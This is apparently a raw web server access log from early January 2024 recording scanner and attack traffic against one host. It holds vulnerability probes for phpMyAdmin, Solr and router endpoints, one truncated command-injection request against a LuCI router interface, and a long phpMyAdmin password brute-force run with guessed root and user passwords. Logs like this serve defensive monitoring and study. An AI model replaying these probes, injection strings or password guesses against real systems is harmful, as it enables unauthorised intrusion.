172.104.11.46 - - [03/Jan/2024:22:40:57 -0600] "\x16\x03\x01" 400 0 "-" "-"

185.224.128.191 - - [03/Jan/2024:23:00:54 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

January 4, 2024

180.149.125.166 - - [04/Jan/2024:00:09:42 -0600] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"

107.170.226.21 - - [04/Jan/2024:00:10:31 -0600] "GET /login.html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

45.95.147.251 - - [04/Jan/2024:00:15:31 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 185.224.128.191 - - [04/Jan/2024:00:18:50 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

103.187.190.83 - - [04/Jan/2024:00:37:48 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 103.187.190.83 - - [04/Jan/2024:00:37:49 -0600] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.83 - - [04/Jan/2024:00:37:49 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 103.187.190.83 - - [04/Jan/2024:00:37:49 -0600] "GET /nmaplowercheck1704350268 HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.83 - - [04/Jan/2024:00:37:49 -0600] "GET /evox/about HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.83 - - [04/Jan/2024:00:37:49 -0600] "GET /HNAP1 HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.83 - - [04/Jan/2024:00:37:50 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 103.187.190.83 - - [04/Jan/2024:00:37:50 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

103.187.190.132 - - [04/Jan/2024:00:37:51 -0600] "GET /v2/_catalog HTTP/1.1" 404 454 "-" "Go-http-client/1.1" 103.187.190.136 - - [04/Jan/2024:00:37:51 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.187.190.68 - - [04/Jan/2024:00:37:51 -0600] "GET /solr/admin/info/system HTTP/1.1" 404 454 "-" "Go-http-client/1.1" 103.187.190.138 - - [04/Jan/2024:00:37:51 -0600] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 454 "-" "Go-http-client/1.1" 103.187.190.70 - - [04/Jan/2024:00:37:51 -0600] "\x16\x03\x01\x01 \x01" 400 0 "-" "-" 103.187.190.68 - - [04/Jan/2024:00:37:52 -0600] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 454 "-" "Go-http-client/1.1" 103.187.190.136 - - [04/Jan/2024:00:37:53 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.187.190.136 - - [04/Jan/2024:00:37:53 -0600] "\x16\x03\x01" 400 0 "-" "-" 103.187.190.75 - - [04/Jan/2024:00:38:13 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.75 - - [04/Jan/2024:00:38:13 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Go-http-client/1.1"

206.189.122.243 - - [04/Jan/2024:00:39:04 -0600] "" 400 0 "-" "-"

138.68.159.201 - - [04/Jan/2024:00:55:13 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

103.149.192.7 - - [04/Jan/2024:00:58:12 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"

107.170.233.14 - - [04/Jan/2024:01:07:52 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

162.243.150.36 - - [04/Jan/2024:01:27:18 -0600] "GET /manager/text/list HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

34.78.6.216 - - [04/Jan/2024:01:47:07 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

217.149.187.250 - - [04/Jan/2024:02:07:47 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"

43.142.81.31 - - [04/Jan/2024:02:18:43 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:45 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:47 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:47 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:48 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:53 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:54 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:54 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:54 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:55 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:55 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:56 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:56 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:57 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:57 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:58 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:58 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:18:59 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:02 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:03 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:04 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:05 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:06 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:07 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:11 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:11 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:11 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:12 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:12 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:14 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:17 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:19 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:20 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:20 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:21 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:21 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:22 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:22 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:23 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:24 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:24 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:25 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [04/Jan/2024:02:19:25 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

165.227.47.218 - - [04/Jan/2024:02:37:06 -0600] "GET /aaa9 HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 165.227.47.218 - - [04/Jan/2024:02:37:11 -0600] "GET /aab8 HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 165.227.47.218 - - [04/Jan/2024:02:37:15 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

141.98.11.136 - - [04/Jan/2024:03:43:07 -0600] "\x03" 400 0 "-" "-"

162.216.150.133 - - [04/Jan/2024:03:57:43 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

193.111.248.92 - - [04/Jan/2024:04:08:03 -0600] "CONNECT google.com:443 HTTP/1.1" 405 501 "-" "Go-http-client/1.1"

83.97.73.245 - - [04/Jan/2024:04:34:25 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

185.224.128.191 - - [04/Jan/2024:04:56:55 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozila/5.0"

65.49.1.60 - - [04/Jan/2024:05:18:15 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 65.49.1.57 - - [04/Jan/2024:05:19:45 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70" 65.49.1.57 - - [04/Jan/2024:05:20:17 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"

83.97.73.245 - - [04/Jan/2024:05:36:38 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

102.129.232.53 - - [04/Jan/2024:05:41:08 -0600] "HEAD / HTTP/1.1" 200 282 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"

68.183.16.208 - - [04/Jan/2024:07:34:19 -0600] "\x16\x03\x01" 400 0 "-" "-" 68.183.16.208 - - [04/Jan/2024:07:34:26 -0600] "\x16\x03\x01" 400 0 "-" "-" 68.183.16.208 - - [04/Jan/2024:07:34:26 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:26 -0600] "GET /form.html HTTP/1.1" 404 435 "-" "curl/8.1.2" 68.183.16.208 - - [04/Jan/2024:07:34:26 -0600] "GET /upl.php HTTP/1.1" 404 435 "-" "Mozilla/5.0" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "\x16\x03\x01" 400 0 "-" "-" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /geoip/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /1.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /bundle.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /files/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /systembc/password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.16.208 - - [04/Jan/2024:07:34:27 -0600] "GET /info.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

45.128.232.91 - - [04/Jan/2024:08:03:32 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

185.224.128.191 - - [04/Jan/2024:08:11:17 -0600] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp;" 400 0 "-" "-"

107.170.208.29 - - [04/Jan/2024:08:12:22 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

14.133.99.185 - - [04/Jan/2024:08:21:31 -0600] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:32 -0600] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:32 -0600] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:32 -0600] "GET /phpmyadmin5/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:32 -0600] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:32 -0600] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:32 -0600] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:33 -0600] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:33 -0600] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:33 -0600] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:33 -0600] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:33 -0600] "GET /__phpmyadmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:33 -0600] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:34 -0600] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:34 -0600] "GET /mysql-admin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:34 -0600] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:34 -0600] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:34 -0600] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:35 -0600] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:35 -0600] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:35 -0600] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 200 4500 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:35 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=darkness HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:35 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=panther HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:35 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=elephant HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:36 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=gateway HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:36 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=saturn HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:36 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=123qweASD HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:36 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=mysqlaccess HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:36 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=gordon HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:36 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=panties HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:37 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=matrix HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:37 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=daniel HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:37 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=user@123456 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:37 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=phpmyadmin HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:37 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=user2017 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:38 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=bonnie HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:38 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=logon HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:38 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=samson HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:38 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root~!@ HTTP/1.1" 200 4187 "-" 